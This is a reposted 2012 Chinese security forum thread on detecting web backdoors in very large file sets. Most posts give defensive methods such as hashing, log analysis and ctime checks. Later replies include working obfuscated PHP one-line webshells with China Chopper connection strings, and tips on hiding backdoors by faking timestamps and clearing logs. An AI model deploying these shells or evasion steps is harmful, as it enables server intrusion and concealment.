文件数百万级,如何有效查找webbackdoor?在各种非主流猥琐变形隐藏手法面前,各位有什么好办法呢?
SinCoder (fuck sec) | 2012-04-18 23:45
这个如果有以前文件的快照的话 那么可以非常快找到 shell 的。
iucker (不要让梦想褪色成幻想) | 2012-04-18 23:58
@SinCoder 如果没有呢?
pangshenjie (whoami) | 2012-04-19 00:06
@iucker 我觉的其他办法就是你筛选的话符合要求的文件数量也是巨大的,各种变形神马的直接找应该比较困难,期待大神给出其他的好办法~
蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-04-19 01:13
关键是排序和排除吧。关键看具体的需求
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2012-04-19 09:37
如果没有保留快照、Hash、时间戳等原始对比信息的话,这个只能遍历了……
判断文件修改时间的方法不可取,因为攻击者极大可能修改了文件时间。
如果遍历的话,高效的处理算法是很关键的。
如果有 Web 访问日志的话,我想,首先可以过滤掉一些 0 访问量的文件,可以大大的减少需要遍历的文件数量,但是有个缺点,如果是图片包含方式的木马,虽然该图片是 0 访问,但是仍被其他脚本加载执行……
不过这个缺点,可以在之后关键词匹配的时候发现出来(判断脚本中所有包含语句,所包含的文件后缀),所以遗漏的几率很小,几乎不会遗漏,凡是遗漏的都是废弃的后门,虽然是图片后缀,但是没有任何一个文件包含,所以也是无法执行的,废弃的,无危害……
总的来说,我可以概括为以下几个步骤:
1、获取文件列表,获取的同时采用【黑名单】过滤掉“.mdb、.html、.css、.js、.txt、.jpg、.gif、.bmp、.mp3、.wav、.mid……”(提示一下,在过滤文件的同时,可以增加一个 if 判断,顺道判断特殊文件名、畸形目录等变形后门,例如:/a.asp/a.jpg、a.asp;a.jpg、a.asp;jpg、aux.asp、com1.asp……,可以直接判定为后门!根本不用再用关键词匹配,省去大量时间……),等非脚本后缀的文件(还可以过滤超大体积的文件),注意:一定是黑名单过滤,如果你使用白名单的话,会遗漏一些特殊路径的文件,例如:a.asp;a.jpg、a.asp;jpg、file(没后缀的)……,经过这个过滤后缀操作,大概可以排除 60% – 70% 以上的非脚本文件,甚至更多(越华丽的网站,图片越多,脚本只占极少数)……
2、如果存在 Web 访问日志的话,如上所述,可以分析一下文件访问频率(可以重点检查访问率高的文件),又可以排除很大一批 0 访问量的文件,这些文件大多数都是一些通用的函数库文件,一般一个网站通用的包含文件很多,而针对前台用户访问的文件只占极少数,这样又可以过滤很大一批文件,起码有 10%,不过这个有个缺陷,首先如果日志很大的话,分析会很消耗时间,而且可能会漏掉一些包含式的后门,这个根据情况使用吧。
3、经过以上的处理,大概只剩下 10% – 20% 的文件需要处理,也就是个 10 万多的文件(Win7 旗舰版安装完后,C 盘大约有 6 多万文件,这实在不算多),挨个读取进行关键词匹配,如果你关键词匹配的算法比较好的话,应该不需要很长时间了。
4、其他过滤算法。
坐等其他大牛更先进的方案……
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2012-04-19 09:38
还可以同时保留这次清理文件的 Hash 值,给以后的清理作参考信息。
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2012-04-19 09:52
再提示一下,可以参考杀毒软件全盘查杀的处理方案……
xsser | 2012-04-19 11:23
如果是应用层出的事情,在应用层对抗很麻烦,我们考虑的思路是更底层,与@核攻击 不同,我们经常的环境是linux环境,所以:1 上传后门往往用户是www,而当时的应用程序的属主是work,甚至mysql创建的后门属主是mysql2 创建时间,在linux下修改ctime是需要root权限的,所以按照ctime分组能够很快判断出一个后门,后门往往和应用程序诞生时间是不一样的3 访问行为,后门与普通应用的访问行为来说,最大的不同在于访问频率和ip,正常应用会被很多人来访问,但是后门往往就只对应一个访问用户
推荐80sec那个分析被黑的文章
换个思路之后,文件多少不是真正的问题 :)
shine | 2012-04-19 11:43
如果应用过多,想防住它是不可能的。所以,在我的系统架构中,做了严格的url访问或文件访问权限校验(当然,都是有利弊共存的,还是要看应用类型),即使留了webbackdoor,攻击者也是无法访问到它!
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2012-04-19 12:37
Good,行为分析很重要!
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2012-04-19 12:38
如果按照杀软的主动防御思路来做的话……
即使他留了后门,行为分析,直接给禁止……
貌似扯远了……
iucker (不要让梦想褪色成幻想) | 2012-04-19 13:06
@蟋蟀哥哥 @xsser @shine @核攻击 @pangshenjie @SinCoder 非常感谢各位解答,真是个耗体力的苦B活…..
GaRY | 2012-04-19 16:30
其实,只要有一个事实运维标准,再结合这个标准做监控(例如版本库svn diff,例如运行用户的属性,例如更新时间的固定性),一切和标准不同的内容都是异常(无论是网络流量、系统属性、文件自身层面),然后再从异常中结合行为特征进行查找会有效减少工作量。建立多层级异常处理机制很重要。
请叫我大神 | 2012-04-19 23:07
实际还有更好的方法,呵呵,比如说吧,你一个web应用,为毛会有尝试读取web目录以外的文件呢?即使有,这种例外是很容易被枚举出来的吧。
这个我觉得是比较猥琐的检测思路了。但是需要和系统结合,做一些文件系统的监控
her0ma | 2012-08-27 15:16
恶意代码分析系统 可以自定义字段 可以完善一下那个工具 是找后门 清挂马的神器!
pentest | 2012-08-27 15:24
就单讨论恶意脚本的静态特征的话,国外有个开源的脚本来着,最近也一直在找,忘了叫什么了
小胖子 | 2012-08-27 15:28
@xsser 我很赞80sec的那次入侵分析,不慌不躁,找准问题关键所在。
除了剑心说的这两个,我有点想补充,如果在LAMP环境下,就按这方法做,要是win呢,谁说不可能用解析洞?所以,定义文件夹及文件规则,先断了解析漏洞,再查找,小菜回答,大牛勿喷,喷者爆菊花!
坏虾 (黑阔都被爆菊花~) | 2012-08-27 16:14
换位思考。
我放后门基本都是修改一个放在很深层的脚本文件,添加一段变形的一句话。然后修改时间清理日志。
linux下用touch修改文件的修改时间可以不需要root。后门文件一定要跟周围的文件所属用户一样都是www或者nobody
大家想想我没做什么?怎么查到?
Spy4man (多人使用的公共号,言论不代表ID本人!) | 2012-08-28 01:30
ctime(看上级目录的)+正则匹配+属性权限+服务的配置文件+过滤日志!
f4tb0y (隆) | 2012-08-28 09:07
后门这种东西都要放在比较深的目录里,还要变一变代码,我还喜欢改成一些比较像正常文件的名字,比如link.asp之类的……文件修改时间有权限是一定要改的
坏虾 (黑阔都被爆菊花~) | 2012-08-28 09:14
@f4tb0y 我喜欢建在缓存文件夹下面。~aadsSFDSWR~FSDGDFG.php 然后一顿回车,在最后面添加一段First:1.php
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
菜刀里写:http://localhost/1.php?2=assert密码:1
Second:2.php
<?php$_=””;$_[+””]=”;$_=”$_”.””;$_=($_[+””]|””).($_[+””]|””).($_[+””]^””);?><?php ${‘_’.$_}[‘_’](${‘_’.$_}[‘__’]);?>
菜刀里写:http://localhost/2.php?_=assert&__=eval($_POST[‘pass’])密码:pass
f4tb0y (隆) | 2012-08-28 12:15
@坏虾 LS 给力啊!又学到知识了~ 我很少搞变形的一句话 thx
小胖子 | 2012-08-28 20:11
@坏虾 感谢,变种厉害!
HuGtion | 2012-08-28 22:04
@坏虾 给力!
坏虾 (黑阔都被爆菊花~) | 2012-08-29 07:49
@HuGtion @小胖子 @f4tb0y 我发的这些都是网上公开的了,想让人发现不了,就自己整点有意思的。
我现在喜欢用这个 <?php
@preg_replace(“/[email]/e”,$_POST[‘h’],”error”);
?>
菜刀附加数据:<O>h=@eval($_POST[c]);</O>
密码 c 不过仔细查下preg_replace,还是会被发现。 一样,都是已经被公开的了。
piaoye (123) | 2012-08-29 17:12
文件多的话,分析行为快速些,建个黑盒环境文件拖进去,一些常见服务器漏洞伪造成蜜罐类似,追踪这些重要的访问记录。
Thanks (freebuF资深屌丝) | 2012-09-03 09:51
@GaRY 讲的靠谱。有没有更具体点的实现方法?
horseluke (微碌) | 2012-09-07 10:39
@xsser 我今天发现一个问题,ctime一致,但肯定是apache创建的……真有人用了root改ctime,而不改属主?还是用别的方式改的?
==============-[隐藏] 1 root root 777 Mar 30 2011 a_normal.class.php-[隐藏] 1 daemon daemon 91877 Mar 30 2011 a_normal.clas.php //木马==============
本文作者:Sofia
版权声明:除非本文有注明出处,否则转载请注明本文来自 https://www.vuln.cn
本文地址:https://www.vuln.cn/8040
生活累,一小半源于生存,一大半源于攀比。
陆邀请码
test那个配置文件的路径在哪里啊
小山支持
Big Tree我和你一样的反应
8848666